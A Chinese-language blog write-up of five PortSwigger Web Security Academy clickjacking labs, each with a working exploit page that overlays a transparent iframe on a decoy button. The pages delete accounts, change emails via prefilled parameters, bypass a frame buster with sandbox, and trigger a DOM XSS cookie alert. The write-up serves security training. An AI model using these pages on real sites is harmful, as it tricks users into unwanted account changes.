Portswigger web security academy:Clickjacking (UI redressing)

1 - Basic clickjacking with CSRF token protection

  • 题目描述

    • 登陆后可以删除账号,但是该功能点有csrf token保护
  • 要求

    • 让受害者删掉自己的账号
  • 解题过程

    • 因为要调CSS,就先用一下材料里给的代码看看(具体参数有问题,自己调整调整,显示没过,然后修改的时候提示solved。。。原本的参数没记下来)

      <head>
      <style>
      #target_website {
      position: relative;
      width: 1280px;
      height: 400px;
      opacity: 0.0000000000001;
      z-index: 2;
      }
      #decoy_website {
      position:absolute;
      top:575px;
      left:100px;
      z-index:1;
      }
      </style>
      </head>
      ...
      <body>
      <div id="decoy_website">
      click
      </div>
      <iframe id="target_website" src="https://ac411f1c1e3720d880aa0ddc00c8008d.web-security-academy.net/my-account">
      </iframe>
      </body>

2 - Clickjacking with form input data prefilled from a URL parameter

  • 题目描述

    • 没啥描述的
  • 要求

    • 利用预填充来修改用户邮箱
  • 解题过程

    • 访问/my-account?email=asd@asd.asd,发现邮箱被预填充进页面

    • 构造恶意页面,钓鱼(借助上一题的代码)

      <head>
      <style>
      #target_website {
      position: relative;
      width: 400px;
      height: 600px;
      opacity: 0.0000001;
      z-index: 2;
      }
      #decoy_website {
      position:absolute;
      top:525px;
      left:100px;
      z-index:1;
      }
      </style>
      </head>
      <body>
      <div id="decoy_website">
      Click me
      </div>
      <iframe id="target_website" src="https://ac131f121fdf9d78802b4cc1006300fb.web-security-academy.net/my-account?email=asd@asd.asd">
      </iframe>
      </body>

3 - Clickjacking with a frame buster script

  • 题目描述

    • 这个lab被frame buster保护着
  • 要求

    • 修改受害者邮箱
  • 解题过程

    • 材料里有说frame buster,大致意思就是只接受自己是最顶层网页(根节点),关于这个东西google上挺多的,[贴一个])(https://zhuanlan.zhihu.com/p/27310909)

    • 但是 iframe指定sandbox为allow-forms或者allow-scripts,且忽略allow-top-navigation会使iframe中的网页不知道自己是否是最顶层网页

    • 构造exp

      <head>
      <style>
      #target_website {
      position: relative;
      width: 400px;
      height: 600px;
      opacity: 0.0000001;
      z-index: 2;
      }
      #decoy_website {
      position:absolute;
      top:505px;
      left:100px;
      z-index:1;
      }
      </style>
      </head>
      <body>
      <div id="decoy_website">
      Click me
      </div>
      <iframe id="target_website" sandbox="allow-forms" src="https://ac741fe61e32394280fe03af00970035.web-security-academy.net/my-account?email=asd@asd.asd">
      </iframe>
      </body>

4 - Exploiting clickjacking vulnerability to trigger DOM-based XSS

  • 题目描述

    • 把Dom based XSS和Clickjacking结合起来
  • 要求

    • alert(document.cookie)
  • 解题过程

    • 首先找XSS,发现在feedback页面可以使用GET预填充参数,提交后,会把name直接打印出来

    • 构造exp

      <head>
      <style>
      #target_website {
      position: relative;
      width: 1000px;
      height: 1000px;
      opacity: 0.00000001;
      z-index: 2;
      }
      #decoy_website {
      position:absolute;
      top:805px;
      left:100px;
      z-index:1;
      }
      </style>
      </head>
      <body>
      <div id="decoy_website">
      Click me
      </div>
      <iframe id="target_website" src="https://ac2c1f701efa1dee807e67af00d40001.web-security-academy.net/feedback?name=%3Cimg/src=x%20onerror=alert(document.cookie)%3E&email=asd@asd.com&subject=asd&message=asd">
      </iframe>
      </body>

5 - Multistep clickjacking

  • 题目描述

    • 这个lab的账号相关的功能点被csrf token保护着,并且有一个确认对话框来防止点击劫持
  • 要求

    • 让受害者删除自己的账号
  • 解题过程

    • 多了个对话框。。。相比实际场景,不需要动态显示就很简单了

    • 上exp

      <head>
      <style>
      #target_website {
      position: relative;
      width: 1000px;
      height: 1000px;
      opacity: 0.0000001;
      z-index: 2;
      }
      #decoy_website_1 {
      position:absolute;
      top:495px;
      left:60px;
      z-index:1;
      }
      #decoy_website_2 {
      position:absolute;
      top:285px;
      left:190px;
      z-index:1;
      }
      </style>
      </head>
      <body>
      <div id="decoy_website_1">
      Click me first
      </div>
      <div id="decoy_website_2">
      Click me next
      </div>
      <iframe id="target_website" src="https://ac871f9f1e4e40b7801a875000290076.web-security-academy.net/my-account">
      </iframe>
      </body>

Portswigger web security academy:Clickjacking (UI redressing)的更多相关文章

  1. Portswigger web security academy:WebSockets

    Portswigger web security academy:WebSockets 目录 Portswigger web security academy:WebSockets Lab: Mani ...

  2. Portswigger web security academy:Cross-origin resource sharing (CORS)

    Portswigger web security academy:Cross-origin resource sharing (CORS) 目录 Portswigger web security ac ...

  3. Portswigger web security academy:XML external entity (XXE) injection

    Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...

  4. Portswigger web security academy:Cross-site request forgery (CSRF)

    Portswigger web security academy:Cross-site request forgery (CSRF) 目录 Portswigger web security acade ...

  5. Portswigger web security academy:OAth authentication vulnerable

    Portswigger web security academy:OAth authentication vulnerable 目录 Portswigger web security academy: ...

  6. Portswigger web security academy:Server-side request forgery (SSRF)

    Portswigger web security academy:Server-side request forgery (SSRF) 目录 Portswigger web security acad ...

  7. Portswigger web security academy:OS command injection

    Portswigger web security academy:OS command injection 目录 Portswigger web security academy:OS command ...

  8. Portswigger web security academy:SQL injection

    Portswigger web security academy:SQL injection 目录 Portswigger web security academy:SQL injection SQL ...

  9. Portswigger web security academy:Server-side template injection(SSTI)

    Portswigger web security academy:Server-side template injection(SSTI) 目录 Portswigger web security ac ...

随机推荐

  1. 浅谈Dotnet的数据定位和匹配

    Dotnet里,数据定位和匹配的相关编程现在变得很舒服.   最近项目紧,还要不停出差. 所以,写个短点的.最近经常用到的内容:数据定位和匹配.   数据定位 假设我们有这样一个数组: var arr ...

  2. PyCharm之python package和directory的区别

    python作为一门解释性的脚本语言.python中模块就是指一个py文件,如果我们将所有相关的代码都放在一个py文件中,则该py文件既是程序又是是模块,但是程序和模块的设计目的是不同的,程序的目的是 ...

  3. 超详细Linux新手快速入门(一)——Linux的介绍安装以及虚拟机的介绍安装

    一.Linux的介绍 1.Linux和Windows的比较  Linux是一款操作系统,其性能稳定,因其防火墙组件高效安全.简单易配置,所以获得了追求速度和安全的一些企业和人群的青睐.与我们日常所熟知 ...

  4. 导出文件,responseType设置了blob,实际返回了JSON格式的错误信息的处理方式

    需求:导出文件 问题描述:由于后台直接返回的文件流,在请求下载的方法中将XHR 的 responseType 指定为 blob 或者 arraybuffer.但并不是每次的操作都是成功的,所以在接口错 ...

  5. vue全家桶和react全家桶

    vue全家桶:vue  +  vuex (状态管理)  + vue-router (路由) + vue-resource +axios +elementui react全家桶 : react + re ...

  6. Python-celery的使用

    安装:pip install celery pip install eventlet 需要提前安装redis. (Download, extract and compile Redis with: $ ...

  7. 11、Spring教程之声明式事务

    1.回顾事务 事务在项目开发过程非常重要,涉及到数据的一致性的问题,不容马虎! 事务管理是企业级应用程序开发中必备技术,用来确保数据的完整性和一致性. 事务就是把一系列的动作当成一个独立的工作单元,这 ...

  8. CVE-2020-1472 Zerologon

    CVE-2020-1472 Zerologon 漏洞简介 CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞,影响Windows Server 2008R 2至Windows ...

  9. 【面试技巧】老生常谈之 n 种使用 CSS 实现三角形的技巧

    在一些面经中,经常能看到有关 CSS 的题目都会有一道如何使用 CSS 绘制三角形,而常见的回答通常也只有使用 border 进行绘制一种方法. 而 CSS 发展到今天,其实有很多有意思的仅仅使用 C ...

  10. 【图像处理】OpenCV+Python图像处理入门教程(七)图像形态学操作

    图像形态学主要从图像内提取分量信息,该分量信息通常对表达图像的特征具有重要意义.例如,在车牌号码识别中,能够使用形态学计算其重要特征信息,在进行识别时,只需对这些特征信息运算即可.图像形态学在目标视觉 ...